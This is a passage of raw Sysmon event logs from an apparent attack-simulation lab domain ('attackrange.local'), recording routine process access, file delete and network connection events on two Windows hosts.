118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.391{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.242{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.241{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.241{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.240{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4EFD2514AFC3B92874763A8C664B8453,SHA256=1CDED4415F152EBC4CE3F8159416F692E141C43947BF503A78920B8A67C758C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.652{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51055-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.652{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51055-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001049613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.547{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local51054-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001049612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.546{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51054-false10.0.1.14win-dc-890.attackrange.local389ldap 23542300x80000000000000001049611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:13.143{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC8376FEA70A64EA8031A547E0D5A6EE,SHA256=F4DE13C95C62540E93EB1602FCB7CC75A3B94697232D5BCBA9B49CAAB0EE8C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:13.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D83F8D76E6DE78391B7679E14B059B7F,SHA256=39B9276CDCB9AE77BFE003B5E651102D2DC3306A10A100F42078C0A2A8BFC6F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:14.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2F45E8D778307F2DFC31823FA125A8,SHA256=F9E4DEDD3286F4536C794175A4FDA68EBB87B17024AFCA800D5537C1B85425ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:14.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCFB1BC921038A7829383D44719C3A6,SHA256=3E5AFD2FD1B34FC9BCC06A60052A350E74F633E050A370DA24B16F198F02DCD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:15.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85057C0964DA90D5800D6753DCDDC4AF,SHA256=16A5590AFD8969F8EC42151E177B8DE70B9412258369FD9A045389C09A3C91F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:14.257{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57290-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:15.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3671A38313717E2F4AB012F92F748873,SHA256=3437DCB0777FBFD73683BB15DE65F2913CF3A91180F546D198E09EAAD5AB14E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:15.420{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78023BC7364E71E9600DD90E2F1CF64E,SHA256=1A11E24ACA07C8F0A396519B2E6EFFE3EF6BCFC1D332C3D971A68D9F5C3F55C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.541{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42F5917CB1CF6016253F5A8F1AE0B37C,SHA256=5F41D530EE81C96F8D5F461C63EEA9D7F63C26E761BAD9EEA163C1B5301015F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:16.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=288D4873A9DEDDB89D801E5B156AF840,SHA256=AE392508FAC602B7301D1ECF6022AB1C3D6AA8B3BCFC4310E4D06B2B9DE33DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9AFCB12D7A00A064DDDC659880E82646,SHA256=D3CC681FDBE495D597A661A1AAA4B6C3FD45127E6A5C14D4C0C19C577B601322,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09C43B2F99352EF8D6E990BF0242DDF0,SHA256=59E7B5871B806258EE4E75BA1CC2D9692B9BD48D3355E93A6D14F5A6D242C5D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:16.242{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 